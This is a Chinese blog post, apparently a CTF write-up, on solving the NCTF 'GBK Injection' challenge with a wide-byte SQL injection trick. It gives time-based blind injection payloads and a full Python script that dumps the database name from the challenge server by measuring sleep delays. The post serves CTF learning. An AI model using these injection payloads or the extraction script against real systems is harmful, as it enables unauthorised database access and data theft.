NCTF之GBK Injection另一种宽字节注入解法

最新推荐文章于 2023-07-14 19:45:40 发布
最新推荐文章于 2023-07-14 19:45:40 发布
阅读量466 收藏
点赞数
分类专栏: CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/103603656
版权

0x00题目:

your sql:select id,title from news where id = '1'
here is the information

0x01以前的题解是使用%df加上单引号,通过宽字节注入。另外#被转移,故使用%23代替#绕过。

但是今天我做的时候,发现另一个payload也可以:

payload:  1’',此处第一个单引号是中文的  ‘,第二个单引号是英文的 '   页面返回如下:

可以看到单引号没有被转义,因此可以通过中文单引号构造payload

我比较喜欢使用延时注入,无论有无回显都能用,缺点是耗时长。

查数据库长度:

index.php?id=1‘'||if((length(database()))=1,sleep(5),2);%23

爆出来数据库长度14.

然后爆数据库名:

‘sae-chinalover’

0x02

此处给出爆数据库名的python3脚本:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import time

#get型时间盲注
def http_blindTime_get(url,payload):
    #记录发包时间
    starttime = time.time()
    result = requests.get(url+payload)
    #记录收包时间
    endtime = time.time()
    if(endtime-starttime<3):
        return False
    else:
        return True
#get方式获取数据库名,攻击载荷需修改函数变量构造
def getDatabaseName(url):
    #先获取数据库长度,推测不会长于16个字符,故range 0,10
    #逻辑为当数据库长度正确时使数据库休眠5秒,故当收发包时间差大于3s时break
    batabaselength = 0
    for i in range(0, 15):
        payload = "index.php?id=1‘%27||if((length(database()))="+str(i)+",sleep(5),2);%23"
        if http_blindTime_get(url,payload):
            databaselength = i
            break
    print('数据库名长度:',str(databaselength))
    if databaselength==0:
        return False
    else:
        #获取的数据库长度不为0,表明成功获取数据库长度,爆数据库名
        databasename=""
        for i in range(1,databaselength+1):
            for j in range(1, 128):
                payload = "index.php?id=%df' or if((ascii(substr((select database()),"+str(i)+",1))="+str(j)+"),sleep(5),0);%23"
                if(http_blindTime_get(url, payload)):
                    databasename += chr(j)
                    break
        print('数据库名:', str(databasename))
        return databasename

def main():
    url="http://chinalover.sinaapp.com/SQL-GBK/"
    getDatabaseName(url)
if __name__ == '__main__':
    main()

其余表名、字段名及flag同上可爆出来。

效果如图:

当然,本题还有其他办法。直接使用union select即可

KogRow
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [NCTF2019]childRSA(费马小定理)
晓寒的博客
07-12 3902
[NCTF2019]childRSA(费马小定理) 题目 from random import choice from Crypto.Util.number import isPrime, sieve_base as primes from flag import flag def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1): return n
buu RSA2
ao52426055的博客
11-27 930
查看题目 类型:dp+n+e+c = m dp泄露 RSA各题型脚本\dp+n+e+c = m import gmpy2 as gp e = 65537 n = 2482540078515262411777215266989018029858327661762216096122588773716205800604331015383280303052199186976436198142009306796121098855338013353484450237516704784370730555447242
BUU-crypto-刷题记录13
m0_57291352的博客
06-30 446
[NCTF2019]childRSA 题目 from random import choice from Crypto.Util.number import isPrime, sieve_base as primes from flag import flag def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes)
BUUCTF_Crypto题目题解记录1
Altering_Ji的博客
07-14 2843
记录来自buu平台上的三道密码学题目,[NCTF2019]childRSA、[HDCTF2019]bbbbbbrsa、[NCTF2019]Keyboard
[NCTF2019]childRSA WP Crypto
Power Security的博客
07-05 608
[NCTF2019]childRSA WP关于费马小定理题目中的p生成原理脚本 网上有关于本篇的writeup不多,虽然n可以直接使用yafu进行分解,但是我认为出题师傅的初衷应该是要考费马小定理,因此对照另一篇WP写一下自己的理解。第一次写WP,哪里写的不对的,欢迎批评指正 关于费马小定理 费马小定理描述的是对与p互素的任意值a,有a^(p-1) = 1 mod p ,根据这个公式,可以得出,存在一个值k,有k*p = a^(p-1) -1,即a^(p-1)-1=kp。 题目中的p生成原理 而题目中的p
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
BUUCTF RSA题目全解2
MikeCoke的博客
08-12 6333
RSA1.[NCTF2019]childRSA2.[HDCTF2019]bbbbbbrsa3.SameMod4.[BJDCTF2020]RSA 1.[NCTF2019]childRSA 别人的解法,利用Crypto.Util.number 中的sieve_base 我的解法: 解题思路: 1.py文件给了,n , c , e。为了求m 由算法pow(c,d,n),可知要先求出d来 由算法 gmpy2.invert(e,N) # N = (q-1)*(p-1) 可知我们要先求出p,
TX小超人密码之路2
2301_78965658的博客
07-14 129
题目已经给出n,c,e和p,q的生产方法,所以我们现在需要求出p,q来解题。根据p和q的生成方式,我们知道(p-1)和(q-1)由前10000个素数中的若干个素数相乘得到。令B=k*(p-1),由费马小定理,有2^B-1 = a^k*(p-1)-1是p的倍数(这里补充一下,这个式子相等是因为a是任意整数,一般约定俗成取2),最后gcd(2^B-1, n) = p,得到p。这一步是为了简化计算,这样就只需要计算2^B(mod n)。运行脚本,获得flag。
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8558
渗透测试-SQL注入之宽字节注入
buu [NCTF2019]childRSA
ao52426055的博客
12-01 1936
查看题目 恩总结不会,愉快的找wp去 这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给, 查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的. 为小于p的任何数的倍数,即我们可以将这10000个素数乘起来就为p-1的倍数,于是尝试用
BUUCTF Crypto [NCTF2019]childRSA wp
hsqGOD's blog
03-16 2947
这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给,于是我们去查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的,在这里我...
【每天学习一点新知识】跟咩咩一起学“宽字节注入
RexHa的博客
10-19 2034
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节。
宽字节注入
<XiaoHai>的博客
06-05 1539
sql注入之宽字节注入
BUUCTF-CRYPTO 刷题记录(一)
lysecl‘s blog
06-18 1561
buuctf crypto部分刷题的记录,此文是第一部分。后续会继续更新。 0x1 救世捷径 其实是算法题,利用Dijkstra算法即可求出 0x2 [NCTF2019]childRSA 题目 def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1):
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值